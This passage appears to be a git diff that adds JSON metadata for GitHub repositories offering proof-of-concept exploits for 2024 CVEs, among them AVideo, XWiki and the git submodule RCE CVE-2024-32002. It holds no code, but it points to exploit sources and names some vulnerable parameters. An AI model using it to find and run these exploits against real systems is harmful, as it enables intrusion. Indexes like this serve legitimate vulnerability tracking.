b/2024/CVE-2024-3177.json new file mode 100644 index 0000000000..0dd85e55c8 --- /dev/null +++ b/2024/CVE-2024-3177.json @@ -0,0 +1,33 @@ +[ + { + "id": 852879948, + "name": "Metasploit-Module-TFM", + "full_name": "Cgv-Dev\/Metasploit-Module-TFM", + "owner": { + "login": "Cgv-Dev", + "id": 128702955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128702955?v=4", + "html_url": "https:\/\/github.com\/Cgv-Dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cgv-Dev\/Metasploit-Module-TFM", + "description": "Module written in Ruby with the objective of exploiting vulnerabilities CVE-2023-2728 and CVE-2024-3177, both related to the secret mount policy in a Kubernetes cluster using a custom Metasploit module. Part of a Cybersecurity Master's degree finalization project.", + "fork": false, + "created_at": "2024-09-05T15:30:51Z", + "updated_at": "2024-09-05T17:44:53Z", + "pushed_at": "2024-09-05T17:44:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31771.json b/2024/CVE-2024-31771.json new file mode 100644 index 0000000000..c12987e0ab --- /dev/null +++ b/2024/CVE-2024-31771.json @@ -0,0 +1,33 @@ +[ + { + "id": 784845906, + "name": "CVE-2024-31771", + "full_name": "restdone\/CVE-2024-31771", + "owner": { + "login": "restdone", + "id": 42227817, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42227817?v=4", + "html_url": "https:\/\/github.com\/restdone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/restdone\/CVE-2024-31771", + "description": null, + "fork": false, + "created_at": "2024-04-10T17:09:34Z", + "updated_at": "2024-05-12T23:00:33Z", + "pushed_at": "2024-05-12T19:59:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31777.json b/2024/CVE-2024-31777.json new file mode 100644 index 0000000000..66db5919cf --- /dev/null +++ b/2024/CVE-2024-31777.json @@ -0,0 +1,33 @@ +[ + { + "id": 785244056, + "name": "Exploit-CVE-2024-31777", + "full_name": "FreySolarEye\/Exploit-CVE-2024-31777", + "owner": { + "login": "FreySolarEye", + "id": 44547688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44547688?v=4", + "html_url": "https:\/\/github.com\/FreySolarEye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FreySolarEye\/Exploit-CVE-2024-31777", + "description": "Public exploit for CVE-2024-31777", + "fork": false, + "created_at": "2024-04-11T13:48:19Z", + "updated_at": "2024-09-08T16:18:00Z", + "pushed_at": "2024-09-08T16:17:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31819.json b/2024/CVE-2024-31819.json new file mode 100644 index 0000000000..ed6130fd31 --- /dev/null +++ b/2024/CVE-2024-31819.json @@ -0,0 +1,64 @@ +[ + { + "id": 778341084, + "name": "CVE-2024-31819", + "full_name": "Chocapikk\/CVE-2024-31819", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-31819", + "description": "Unauthenticated Remote Code Execution (RCE) Vulnerability in WWBNIndex Plugin of AVideo Platform from 12.4 to 14.2", + "fork": false, + "created_at": "2024-03-27T14:41:10Z", + "updated_at": "2024-09-06T10:30:02Z", + "pushed_at": "2024-04-11T20:51:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 812561319, + "name": "CVE-2024-31819", + "full_name": "dream434\/CVE-2024-31819", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2024-31819", + "description": "An issue in WWBN AVideo v.12.4 through v.14.2 allows a remote attacker to execute arbitrary code via the systemRootPath parameter of the submitIndex.php component.", + "fork": false, + "created_at": "2024-06-09T08:48:21Z", + "updated_at": "2024-10-09T13:48:07Z", + "pushed_at": "2024-10-09T13:48:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3183.json b/2024/CVE-2024-3183.json new file mode 100644 index 0000000000..596625993b --- /dev/null +++ b/2024/CVE-2024-3183.json @@ -0,0 +1,33 @@ +[ + { + "id": 842524366, + "name": "CVE-2024-3183-POC", + "full_name": "Cyxow\/CVE-2024-3183-POC", + "owner": { + "login": "Cyxow", + "id": 31488526, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31488526?v=4", + "html_url": "https:\/\/github.com\/Cyxow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyxow\/CVE-2024-3183-POC", + "description": "POC for CVE-2024-3183 (FreeIPA Rosting)", + "fork": false, + "created_at": "2024-08-14T14:24:58Z", + "updated_at": "2024-09-20T07:07:05Z", + "pushed_at": "2024-08-20T14:16:04Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31835.json b/2024/CVE-2024-31835.json new file mode 100644 index 0000000000..7137d77824 --- /dev/null +++ b/2024/CVE-2024-31835.json @@ -0,0 +1,33 @@ +[ + { + "id": 864144112, + "name": "CVE-2024-31835", + "full_name": "paragbagul111\/CVE-2024-31835", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-31835", + "description": "Cross Site Scripting vulnerability in flatpress CMS Flatpress v1.3 allows a remote attacker to execute arbitrary code via a craftedpayload to the file name parameter.", + "fork": false, + "created_at": "2024-09-27T15:17:10Z", + "updated_at": "2024-09-27T15:38:41Z", + "pushed_at": "2024-09-27T15:38:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31848.json b/2024/CVE-2024-31848.json new file mode 100644 index 0000000000..926dffbbd6 --- /dev/null +++ b/2024/CVE-2024-31848.json @@ -0,0 +1,43 @@ +[ + { + "id": 797175885, + "name": "CVE-2024-31848-PoC", + "full_name": "Stuub\/CVE-2024-31848-PoC", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-31848-PoC", + "description": "PoC for Exploiting CVE-2024-31848\/49\/50\/51 - File Path Traversal ", + "fork": false, + "created_at": "2024-05-07T10:42:03Z", + "updated_at": "2024-11-20T16:30:46Z", + "pushed_at": "2024-05-07T17:54:28Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cdata", + "cve-2024-31848", + "cve-2024-31849", + "cve-2024-31850", + "cve-2024-31851", + "jetty", + "poc", + "threat", + "threat-intel" + ], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31974.json b/2024/CVE-2024-31974.json new file mode 100644 index 0000000000..fdd9a27299 --- /dev/null +++ b/2024/CVE-2024-31974.json @@ -0,0 +1,33 @@ +[ + { + "id": 801830634, + "name": "com.solarized.firedown", + "full_name": "actuator\/com.solarized.firedown", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.solarized.firedown", + "description": "CVE-2024-31974", + "fork": false, + "created_at": "2024-05-17T02:02:00Z", + "updated_at": "2024-05-17T02:14:05Z", + "pushed_at": "2024-05-17T02:10:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31982.json b/2024/CVE-2024-31982.json new file mode 100644 index 0000000000..495665d8e8 --- /dev/null +++ b/2024/CVE-2024-31982.json @@ -0,0 +1,95 @@ +[ + { + "id": 818584647, + "name": "CVE-2024-31982", + "full_name": "k3lpi3b4nsh33\/CVE-2024-31982", + "owner": { + "login": "k3lpi3b4nsh33", + "id": 118002757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4", + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-31982", + "description": null, + "fork": false, + "created_at": "2024-06-22T08:47:20Z", + "updated_at": "2024-06-24T06:47:27Z", + "pushed_at": "2024-06-22T08:50:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818721820, + "name": "CVE-2024-31982", + "full_name": "th3gokul\/CVE-2024-31982", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-31982", + "description": "A tool for vulnerability detection and exploitation tool for CVE-2024-31982 ", + "fork": false, + "created_at": "2024-06-22T17:04:02Z", + "updated_at": "2024-07-10T13:48:18Z", + "pushed_at": "2024-06-22T19:31:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818783620, + "name": "CVE-2024-31982", + "full_name": "bigb0x\/CVE-2024-31982", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-31982", + "description": "POC for CVE-2024-31982: XWiki Platform Remote Code Execution > 14.10.20", + "fork": false, + "created_at": "2024-06-22T21:20:33Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-06-22T22:29:24Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-31989.json b/2024/CVE-2024-31989.json new file mode 100644 index 0000000000..ed585364ff --- /dev/null +++ b/2024/CVE-2024-31989.json @@ -0,0 +1,33 @@ +[ + { + "id": 830068924, + "name": "CVE-2024-31989", + "full_name": "vt0x78\/CVE-2024-31989", + "owner": { + "login": "vt0x78", + "id": 140315902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140315902?v=4", + "html_url": "https:\/\/github.com\/vt0x78", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vt0x78\/CVE-2024-31989", + "description": "Exploit for CVE-2024-31989.", + "fork": false, + "created_at": "2024-07-17T14:23:52Z", + "updated_at": "2024-08-08T18:35:48Z", + "pushed_at": "2024-07-24T12:06:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32002.json b/2024/CVE-2024-32002.json new file mode 100644 index 0000000000..17830c318b --- /dev/null +++ b/2024/CVE-2024-32002.json @@ -0,0 +1,1988 @@ +[ + { + "id": 802138178, + "name": "CVE-2024-32002", + "full_name": "markuta\/CVE-2024-32002", + "owner": { + "login": "markuta", + "id": 9108334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9108334?v=4", + "html_url": "https:\/\/github.com\/markuta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/markuta\/CVE-2024-32002", + "description": "A proof of concept for the git vulnerability CVE-2024-32002", + "fork": false, + "created_at": "2024-05-17T15:35:50Z", + "updated_at": "2024-10-28T06:59:18Z", + "pushed_at": "2024-05-30T21:04:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802139060, + "name": "hooky", + "full_name": "markuta\/hooky", + "owner": { + "login": "markuta", + "id": 9108334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9108334?v=4", + "html_url": "https:\/\/github.com\/markuta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/markuta\/hooky", + "description": "A submodule for exploiting CVE-2024-32002 vulnerability.", + "fork": false, + "created_at": "2024-05-17T15:37:42Z", + "updated_at": "2024-05-17T17:00:30Z", + "pushed_at": "2024-05-17T17:00:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802232037, + "name": "git_rce", + "full_name": "amalmurali47\/git_rce", + "owner": { + "login": "amalmurali47", + "id": 3582096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3582096?v=4", + "html_url": "https:\/\/github.com\/amalmurali47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amalmurali47\/git_rce", + "description": "Exploit PoC for CVE-2024-32002", + "fork": false, + "created_at": "2024-05-17T19:33:08Z", + "updated_at": "2024-11-28T15:59:04Z", + "pushed_at": "2024-05-19T07:12:00Z", + "stargazers_count": 515, + "watchers_count": 515, + "has_discussions": false, + "forks_count": 145, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-32002", + "git", + "proof-of-concept", + "rce" + ], + "visibility": "public", + "forks": 145, + "watchers": 515, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 802232904, + "name": "hook", + "full_name": "amalmurali47\/hook", + "owner": { + "login": "amalmurali47", + "id": 3582096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3582096?v=4", + "html_url": "https:\/\/github.com\/amalmurali47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amalmurali47\/hook", + "description": "Hook for the PoC for exploiting CVE-2024-32002", + "fork": false, + "created_at": "2024-05-17T19:35:44Z", + "updated_at": "2024-10-31T07:05:58Z", + "pushed_at": "2024-05-19T06:30:05Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802333923, + "name": "CVE-2024-32002", + "full_name": "M507\/CVE-2024-32002", + "owner": { + "login": "M507", + "id": 38591075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38591075?v=4", + "html_url": "https:\/\/github.com\/M507", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M507\/CVE-2024-32002", + "description": "local poc for CVE-2024-32002", + "fork": false, + "created_at": "2024-05-18T02:42:33Z", + "updated_at": "2024-06-20T21:48:47Z", + "pushed_at": "2024-05-18T19:32:18Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-32002", + "git", + "proof-of-concept", + "rce", + "rce-exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802464979, + "name": "cve-2024-32002-submodule-rce", + "full_name": "JakobTheDev\/cve-2024-32002-submodule-rce", + "owner": { + "login": "JakobTheDev", + "id": 21337744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4", + "html_url": "https:\/\/github.com\/JakobTheDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-submodule-rce", + "description": null, + "fork": false, + "created_at": "2024-05-18T11:20:31Z", + "updated_at": "2024-05-25T12:20:05Z", + "pushed_at": "2024-05-25T12:05:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802465835, + "name": "cve-2024-32002-poc-rce", + "full_name": "JakobTheDev\/cve-2024-32002-poc-rce", + "owner": { + "login": "JakobTheDev", + "id": 21337744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4", + "html_url": "https:\/\/github.com\/JakobTheDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-poc-rce", + "description": null, + "fork": false, + "created_at": "2024-05-18T11:23:43Z", + "updated_at": "2024-07-03T13:48:33Z", + "pushed_at": "2024-05-25T12:18:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802533707, + "name": "CVE-2024-32002", + "full_name": "safebuffer\/CVE-2024-32002", + "owner": { + "login": "safebuffer", + "id": 20618414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20618414?v=4", + "html_url": "https:\/\/github.com\/safebuffer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safebuffer\/CVE-2024-32002", + "description": "CVE-2024-32002 RCE PoC", + "fork": false, + "created_at": "2024-05-18T15:05:28Z", + "updated_at": "2024-11-28T17:21:51Z", + "pushed_at": "2024-05-18T15:12:59Z", + "stargazers_count": 102, + "watchers_count": 102, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "git", + "rce" + ], + "visibility": "public", + "forks": 25, + "watchers": 102, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 802725660, + "name": "CVE-2024-32002-POC", + "full_name": "10cks\/CVE-2024-32002-POC", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-POC", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:05:07Z", + "updated_at": "2024-05-19T05:05:10Z", + "pushed_at": "2024-05-19T05:05:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802726337, + "name": "CVE-2024-32002-hulk", + "full_name": "10cks\/CVE-2024-32002-hulk", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-hulk", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:08:08Z", + "updated_at": "2024-05-19T05:29:27Z", + "pushed_at": "2024-05-19T05:29:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802726386, + "name": "CVE-2024-32002-submod", + "full_name": "10cks\/CVE-2024-32002-submod", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-submod", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:08:22Z", + "updated_at": "2024-05-19T05:11:25Z", + "pushed_at": "2024-05-19T05:11:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802726432, + "name": "CVE-2024-32002-smash", + "full_name": "10cks\/CVE-2024-32002-smash", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-smash", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:08:36Z", + "updated_at": "2024-05-19T05:08:36Z", + "pushed_at": "2024-05-19T05:08:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802731173, + "name": "CVE-2024-32002-linux-hulk", + "full_name": "10cks\/CVE-2024-32002-linux-hulk", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-linux-hulk", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:31:41Z", + "updated_at": "2024-05-19T05:33:27Z", + "pushed_at": "2024-05-19T05:33:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802731253, + "name": "CVE-2024-32002-linux-submod", + "full_name": "10cks\/CVE-2024-32002-linux-submod", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-linux-submod", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:32:08Z", + "updated_at": "2024-05-19T05:33:50Z", + "pushed_at": "2024-05-19T05:33:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802731336, + "name": "CVE-2024-32002-linux-smash", + "full_name": "10cks\/CVE-2024-32002-linux-smash", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-linux-smash", + "description": null, + "fork": false, + "created_at": "2024-05-19T05:32:34Z", + "updated_at": "2024-05-19T05:32:34Z", + "pushed_at": "2024-05-19T05:32:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802930172, + "name": "poc_CVE-2024-32002", + "full_name": "aitorcastel\/poc_CVE-2024-32002", + "owner": { + "login": "aitorcastel", + "id": 28706936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28706936?v=4", + "html_url": "https:\/\/github.com\/aitorcastel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aitorcastel\/poc_CVE-2024-32002", + "description": null, + "fork": false, + "created_at": "2024-05-19T16:33:35Z", + "updated_at": "2024-05-19T16:34:58Z", + "pushed_at": "2024-05-19T16:34:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802930338, + "name": "poc_CVE-2024-32002_submodule", + "full_name": "aitorcastel\/poc_CVE-2024-32002_submodule", + "owner": { + "login": "aitorcastel", + "id": 28706936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28706936?v=4", + "html_url": "https:\/\/github.com\/aitorcastel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aitorcastel\/poc_CVE-2024-32002_submodule", + "description": null, + "fork": false, + "created_at": "2024-05-19T16:34:11Z", + "updated_at": "2024-05-19T16:34:52Z", + "pushed_at": "2024-05-19T16:34:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803075707, + "name": "hook", + "full_name": "10cks\/hook", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/hook", + "description": "CVE-2024-32002-hook", + "fork": false, + "created_at": "2024-05-20T02:44:07Z", + "updated_at": "2024-05-20T06:46:22Z", + "pushed_at": "2024-05-20T02:47:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803077786, + "name": "CVE-2024-32002_HOOK", + "full_name": "jweny\/CVE-2024-32002_HOOK", + "owner": { + "login": "jweny", + "id": 26767398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4", + "html_url": "https:\/\/github.com\/jweny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jweny\/CVE-2024-32002_HOOK", + "description": null, + "fork": false, + "created_at": "2024-05-20T02:52:42Z", + "updated_at": "2024-05-22T18:10:22Z", + "pushed_at": "2024-05-20T03:12:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803079258, + "name": "CVE-2024-32002_EXP", + "full_name": "jweny\/CVE-2024-32002_EXP", + "owner": { + "login": 